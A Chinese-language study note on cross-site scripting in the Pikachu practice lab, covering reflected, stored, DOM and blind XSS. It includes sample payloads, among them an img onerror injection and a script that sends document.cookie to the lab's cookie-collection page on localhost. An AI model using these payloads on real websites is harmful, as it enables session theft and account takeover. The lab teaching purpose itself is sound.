网安-XSS-pikachu

介绍

XSS,即跨站脚本攻击,是指攻击者利用Web服务器中的代码漏洞,在页面中嵌入客户端脚本(通常是一段由JavaScript编写的恶意代码),当信任此Web服务器的用户访问

Web站点中含有恶意脚本代码的页面,用户浏览器会自动加载并执行该恶意代码,从而达到攻击的目的。

XSS分类一般如下:

1.反射型XSS

2.存储型XSS

3.DOM型XSS

1.反射型XSS,非持久性XSS

alert(document.cookie) //弹出当前cookie

2.存储型XSS,持久性XSS,JS代码会存在后台

3.DOM型XSS也是一种反射型,但是输入的语句不是JS的语句,是DOM语法

'"><img onerror=alert(0) src=><"'

利用XSS进行攻击:

攻击方:

找到存储cookie的url:http://localhost/pikachu/pkxss/xssmanager.php/xcookie/cookie.php

编辑攻击代码:

<script>

document.location = 'http://127.0.0.1/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;

</script>

用户访问留言板,攻击方就收集到用户的cookie 了

4.XSS盲打

攻击的注入点(用户提交数据的页面)和显示点(管理员查看数据的页面)不同。

输入的内容不会在前端输出,而是提交到了后台。

管理员登录后台管理界面,可能遭受到XSS攻击。

5.XSS过滤

<script>

alert(document.cookie)

</script>

相关推荐
~无忧花开~3 分钟前
CSS学习笔记(五):CSS媒体查询入门指南
开发语言·前端·css·学习·媒体
程序猿小D10 分钟前
【完整源码+数据集+部署教程】【零售和消费品&存货】价格标签检测系统源码&数据集全套:改进yolo11-RFAConv
前端·yolo·计算机视觉·目标跟踪·数据集·yolo11·价格标签检测系统源码
newxtc16 分钟前
【猿辅导-注册安全分析报告-无验证方式导致安全隐患】
开发语言·selenium·安全·yolo·安全爆破
吴鹰飞侠18 分钟前
AJAX的学习
前端·学习·ajax
JNU freshman24 分钟前
vue 技巧与易错
前端·javascript·vue.js
风语者日志29 分钟前
CTFSHOW—WEB4
网络·安全·web安全·网络安全·ctf
落一落,掉一掉32 分钟前
第十二周 waf绕过和前端加密绕过
前端
Asort32 分钟前
JavaScript设计模式(十六)——迭代器模式:优雅遍历数据的艺术
前端·javascript·设计模式
Coffeeee41 分钟前
Labubu很难买?那是因为还没有用Compose来画一个
前端·kotlin·android jetpack
我是日安41 分钟前
从零到一打造 Vue3 响应式系统 Day 28 - shallowRef、shallowReactive
前端·javascript·vue.js